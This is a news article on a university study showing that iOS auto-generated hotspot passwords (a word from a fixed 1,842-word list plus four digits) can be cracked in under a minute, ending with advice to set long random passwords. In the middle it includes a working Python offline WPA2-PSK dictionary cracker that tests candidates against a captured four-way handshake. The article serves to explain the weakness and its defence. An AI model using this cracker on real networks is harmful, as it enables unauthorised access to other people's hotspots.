The ability to turn your iPhone into a Wi-Fi hotspot is a fantastically useful little tool in and of itself. But Apple, being the generous overlord that it is, goes so far as to automatically generate a network key, keeping even the most absent-minded Wi-Fi beggar safe and sound. Or so we thought. According to a new study, iOS-generated hotspot passwords follow a very specific formula, one that a reasonably equipped attacker can crack in less than a minute.
Written by researchers at Germany's University of Erlangen-Nuremberg, the paper, Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots, details how iOS's supposedly random, secure passwords are all actually just a short English word (four to six letters) drawn from a fixed list, followed by a four-digit number.
Admittedly, this method does make the passwords vary from device to device, but there's a limited selection of words that Apple picks from: 1,842 words, to be exact. Combined with the 10,000 possible digit suffixes, that is only 18.42 million candidates, roughly 24 bits of entropy, a trivial search for a WPA2 offline attack. The words came from an open-source Scrabble game, meaning the researchers knew exactly what they were working with, and it showed. They walked away with a 100% password-cracking success rate.
Part of their success was due to the hardware now available for this kind of work. The attack is the standard one against WPA2-PSK: sniff the four-way handshake when a client joins the hotspot, then test candidate passphrases offline against the captured handshake without ever touching the network again. The researchers ran that search on a GPU cluster consisting of four AMD Radeon HD 7970s, which let them finish each job within 50 seconds. And this tale of caution is just as much for Apple as it is for the consumer. From the paper:
In the context of mobile hotspots, there is no need to create easily memorisable passwords. After a device has been paired once by typing out the displayed hotspot password, the entered credentials are usually cached within the associating device, and are reused within subsequent connections. System-generated passwords should be reasonably long, and should use a reasonably large character set. Consequently, hotspot passwords should be composed of completely random sequences of letters, numbers, and special characters.
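To make the attack above concrete, here is an added example (not code from the paper, from Apple, or from ZDNet) of the offline search an attacker runs once a WPA2 four-way handshake has been captured. It derives the PMK with PBKDF2-HMAC-SHA1 the way WPA2-PSK does, expands it to the PTK, and checks each word-plus-four-digits candidate against the handshake's MIC. The five-word list, the SSID, the MAC addresses, the nonces and the target passphrase are all constructed for the example; Apple's real 1,842-word list is not reproduced here.

```python
"""Offline WPA2-PSK dictionary attack against an iOS-style hotspot password.

Candidates take the form <word><4 digits>, as the article describes. Every
word, address, nonce and passphrase below is constructed for this example.
"""
import hashlib
import hmac
import os
from itertools import product

# Constructed stand-in for Apple's 1,842-word list (assumption: not the real list).
WORDS = ["head", "suave", "coast", "frog", "subbed"]
SSID = "iPhone"           # hotspot SSID doubles as the PBKDF2 salt
IOS_WORD_COUNT = 1842     # figure reported by the paper
MIC_OFFSET = 81           # EAPOL-Key MIC field: 1+1+2+1+2+2+8+32+16+8+8 bytes precede it


def keyspace_size(word_count=IOS_WORD_COUNT, digits=4):
    """Number of <word><digits> candidates: 1,842 * 10**4 = 18,420,000."""
    return word_count * 10 ** digits


def pmk(passphrase, ssid):
    """WPA2 PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def kck(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """Key Confirmation Key = first 16 bytes of the PTK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk_bytes, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck_bytes, eapol):
    """WPA2/CCMP MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck_bytes, zeroed, hashlib.sha1).digest()[:16]


def build_handshake(passphrase, ssid=SSID):
    """Fabricate what a sniffer would hand the cracker: message 2 of the handshake."""
    ap_mac, sta_mac = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = os.urandom(32), os.urandom(32)
    # Minimal EAPOL-Key frame: header, nonce, zeroed IV/RSC/ID, MIC placeholder, no key data.
    frame = (b"\x02\x03" + (95).to_bytes(2, "big")     # version, type, body length
             + b"\x02" + b"\x01\x0a" + b"\x00\x10"     # descriptor type, key info, key length
             + b"\x00" * 7 + b"\x01"                  # replay counter
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
             + b"\x00" * 16 + b"\x00\x00")            # MIC placeholder, key data length
    key = kck(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = frame[:MIC_OFFSET] + eapol_mic(key, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac, "anonce": anonce, "eapol": frame}


def crack(hs, words=WORDS, digits=range(10000)):
    """Walk <word><4 digits> candidates until one reproduces the captured MIC."""
    snonce = hs["eapol"][17:49]                      # SNonce sits after the 17-byte header
    target = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word, n in product(words, digits):
        cand = f"{word}{n:04d}"
        key = kck(pmk(cand, hs["ssid"]), hs["ap"], hs["sta"], hs["anonce"], snonce)
        if hmac.compare_digest(eapol_mic(key, hs["eapol"]), target):
            return cand
    return None


if __name__ == "__main__":
    # Target chosen near the start of the search so the demo finishes quickly;
    # a real run walks all 10,000 suffixes for every word on the list.
    print("keyspace:", keyspace_size())
    print("recovered:", crack(build_handshake("head0217")))
```

Each candidate costs one PBKDF2 run of 4,096 HMAC-SHA1 iterations, which is exactly the work a GPU parallelises well; the article's figure of 18.42 million candidates in 50 seconds works out to roughly 370,000 PBKDF2 derivations per second across the four cards. A fully random 12-character alphanumeric passphrase, by contrast, has about 3 x 10^21 candidates and would take the same cluster millions of years.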
It's a bit unsettling to think about how many iOS users out there right now are effectively just sitting ducks, but Apple, like most vendors, doesn't force you to keep the automatically generated password: the hotspot password can be changed under the Personal Hotspot settings. There are plenty of genuine random password generators floating around the internet, and it's best to err on the side of caution: pick something long and random, paste it in once, and let your devices remember it, as the paper suggests. And rest assured, these generators aren't pulling from Scrabble. [ZDNet]